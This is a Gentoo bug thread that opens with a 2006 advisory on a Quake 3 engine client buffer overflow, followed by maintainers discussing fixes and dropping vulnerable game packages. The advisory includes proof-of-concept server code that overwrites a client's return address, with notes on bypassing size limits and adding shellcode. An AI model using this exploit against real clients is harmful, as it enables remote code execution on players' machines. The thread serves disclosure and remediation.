####################################################################### Luigi Auriemma Application: Quake 3 engine http://www.idsoftware.com http://www.icculus.org/quake3/ Versions: Quake 3 <= 1.32c Icculus.org Quake 3 <= revision 795 other derived projects Games: exist many games which use the Quake 3 engine and probably they are all vulnerable but I'm not able and have no time to test them. An enough complete list of these games is available here: http://en.wikipedia.org/wiki/Quake_III_engine#Uses_of_the_engine Platforms: Windows, *nix, *BSD, Mac and others Bug: buffer-overflow in CL_ParseDownload Exploitation: remote, versus client Date: 02 Jun 2006 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== The Quake 3 engine is the famous game engine developed by id Software (http://www.idsoftware.com) in the far 1999 but is still one of the most used, licensed and played engines. It has been released open source under the GPL license some months ago and now it's mainly maintained by Icculus (http://www.icculus.org/quake3/) although exist many other derived projects. ####################################################################### ====== 2) Bug ====== The CL_ParseDownload function located in code/client/cl_parse.c is used by the clients for handling the download commands (svc_download) received from the server. The function uses a signed 16 bit number sent by the server for copying raw data from the network to the data buffer of 16384 (MAX_MSGLEN) bytes: void CL_ParseDownload ( msg_t *msg ) { int size; unsigned char data[MAX_MSGLEN]; ... size = MSG_ReadShort ( msg ); if (size > 0) MSG_ReadData( msg, data, size ); ... Some interesting details: The (reassembled) packets handled by Quake 3 can be max 16384 bytes but is possible to bypass this limit through the huffman compression used automatically and trasparently in the engine (thanx to Thilo Schulz). In short for exploiting this bug is enough to use 16384 NULL (0x00) bytes, which occupy a very small amount of space, followed by the usual "stuff" (return address to overwrite and shellcode). The data copied with the MSG_ReadData is raw so there are no bad bytes to avoid for the exploitation. Note that the svc_download can be sent to the client in any moment so the client can be attacked also immediately after the ending of the connect handshake (just the first server's message). ####################################################################### =========== 3) The Code =========== The server must be modified for sending the malformed svc_download command and is possible to use the following instructions which demonstrate how to overwrite the return address with 0x61616161. It's enough to place them in code/server/sv_client.c just after the "// send the gamestate" comment at about line 575: // send the gamestate int i; MSG_WriteByte( &msg, svc_download ); MSG_WriteShort( &msg, -1 ); // block != 0, for fast return MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy for(i = 0; i < 16384; i++) { // overwrite the data buffer MSG_WriteByte(&msg, 0x00); // 0x00 for saving space } for(i = 0; i < 32; i++) { // do the rest of the job MSG_WriteByte(&msg, 'a'); // return address: 0x61616161 } SV_SendMessageToClient( &msg, client ); return; ####################################################################### ====== 4) Fix ====== Icculus will fix the code soon. I have tried to contact id Software too but it's only time lost... The developers of the other derived projects and games have not been contacted (almost all the games are no longer supported and it's a bit long for me to find and contact each single developer of the other open source projects). #######################################################################
A new one, which is still in [upstream] status. Impact: possible execution of arbitrary code with a malicious server. Description: RunningBon has reported two vulnerabilities in the Quake 3 Engine, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a user's system. 1) A boundary error exist in the "CG_ServerCommand()" function when receiving long server commands. This can be exploited to cause a stack-based buffer overflow via overly long server commands sent from the server. Successful exploitation may allow arbitrary code execution, but requires that the user is e.g. tricked into connecting to a malicious server. 2) A boundary error exists in the handling of CS_ITEMs sent from a server. This can be exploited to cause a stack-based buffer overflow by sending overly long values to the client. Successful exploitation may allow arbitrary code execution, but requires that the user is e.g. tricked into connecting to a malicious server. Solution: Only connect to trusted servers. Provided and/or discovered by: RunningBon Original Advisory: http://milw0rm.com/exploits/1976 http://milw0rm.com/exploits/1977
So this bug is about 1.5 years old and still in [upstream] status... There still appear to be vulnerable packages in the tree Actually I believe those should have been masked a long while ago, any comments on how to proceed here?
At least the first bug has been fixed upstream. I dunno if the derivates are fixed, too. We also ship games-fps/quake3-1.34_rc3 which should not be vulnerable anymore. There's no earlier version of quake3 stable. So if this would be only about quake3, i'd say downgrade to ~2 and close RESO FIXED, no glsa. I'm not changing anything b/c i'm not sure on the other two bugs and about updated ebuilds for the rest of the mentioned games. Can somebody help here?
I just checked the bugs mentioned in c#2: they are fixed in r813, that's way before the release of 1.34_rc3. So quake3 itself should be save to use.
And the releases of rtcw, enemy-territory are about two months before the second advisories. I recommend masking them. games herd?
@games herd: I would like this bug to be resolved one way or another. Is anything still vulnerable, as far as you all can tell? Do we care if things are still vulnerable?
Is anyone against last-riting these packages? Should those that are stable be dropped to unstable? games-fps/rtcw games-fps/enemy-territory games-fps/enemy-territory-etpro games-fps/enemy-territory-omnibot games-fps/enemy-territory-truecombat It seems this bug was fixed for rtcw which is unstable, however, all the other Quake 3 engine games are very difficult to confirm. Thanks.
(In reply to Aaron Bauman from comment #7) > Is anyone against last-riting these packages? Should those that are stable > be dropped to unstable? > > games-fps/rtcw > games-fps/enemy-territory > games-fps/enemy-territory-etpro > games-fps/enemy-territory-omnibot > games-fps/enemy-territory-truecombat > > It seems this bug was fixed for rtcw which is unstable, however, all the > other Quake 3 engine games are very difficult to confirm. Thanks. I still play both games occasionally. Although for rtcw I started using the open source alternaive which can be found in the gamerlay-overlay (currently only single-player mode is supported by the ebuild): https://cgit.gentoo.org/proj/gamerlay.git/tree/games-fps/rtcw and for enemy-territory I'd love to see an ebuild in the tree for the open-source version (which is called etlegacy): https://bugs.gentoo.org/530130
(In reply to Lars Wendler (Polynomial-C) from comment #8) > (In reply to Aaron Bauman from comment #7) > > Is anyone against last-riting these packages? Should those that are stable > > be dropped to unstable? > > > > games-fps/rtcw > > games-fps/enemy-territory > > games-fps/enemy-territory-etpro > > games-fps/enemy-territory-omnibot > > games-fps/enemy-territory-truecombat > > > > It seems this bug was fixed for rtcw which is unstable, however, all the > > other Quake 3 engine games are very difficult to confirm. Thanks. > > I still play both games occasionally. Although for rtcw I started using the > open source alternaive which can be found in the gamerlay-overlay (currently > only single-player mode is supported by the ebuild): > > https://cgit.gentoo.org/proj/gamerlay.git/tree/games-fps/rtcw > > and for enemy-territory I'd love to see an ebuild in the tree for the > open-source version (which is called etlegacy): > > https://bugs.gentoo.org/530130 So folks have alternatives which is nice. I am thinking last-rites may be in order here. This vulnerability is extremely long standing.
Well, my brothers are playing to enemy-territory nearly every day :/
Update: the original project is now handled by https://ioquake3.org/ from the home page: What is ioquake3? ioquake3 is a free software first person shooter engine based on the Quake 3: Arena and Quake 3: Team Arena source code. The source code is licensed under the GPL version 2, and was first released under that license by id software on August 20th, 2005. Since then, we have been cleaning it up, fixing bugs, and adding features. Maybe there are some fixes regarding this bug
The bug has been closed via the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4203956ca175dab36cde87b104806e09410f7fbd commit 4203956ca175dab36cde87b104806e09410f7fbd Author: Aaron Bauman <bman@gentoo.org> AuthorDate: 2019-12-08 21:26:36 +0000 Commit: Aaron Bauman <bman@gentoo.org> CommitDate: 2019-12-08 21:27:54 +0000 games-fps/{enemy-territory,rtcw}: drop vulnerable pkgs Closes: https://bugs.gentoo.org/135645 Signed-off-by: Aaron Bauman <bman@gentoo.org> games-fps/enemy-territory-omnibot/Manifest | 2 - .../enemy-territory-omnibot-0.85.ebuild | 20 ---- games-fps/enemy-territory-omnibot/metadata.xml | 12 -- games-fps/enemy-territory-truecombat/Manifest | 2 - .../enemy-territory-truecombat-0.49b.ebuild | 36 ------ games-fps/enemy-territory-truecombat/metadata.xml | 8 -- games-fps/enemy-territory/Manifest | 3 - .../enemy-territory-2.60b-r1.ebuild | 124 --------------------- games-fps/enemy-territory/metadata.xml | 11 -- games-fps/rtcwmp-demo/Manifest | 1 - games-fps/rtcwmp-demo/files/rtcwmp-demo-ded.rc | 24 ---- games-fps/rtcwmp-demo/metadata.xml | 11 -- games-fps/rtcwmp-demo/rtcwmp-demo-1.1-r2.ebuild | 68 ----------- games-fps/rtcwsp-demo/Manifest | 1 - games-fps/rtcwsp-demo/metadata.xml | 12 -- games-fps/rtcwsp-demo/rtcwsp-demo-1.1b-r2.ebuild | 55 --------- 16 files changed, 390 deletions(-)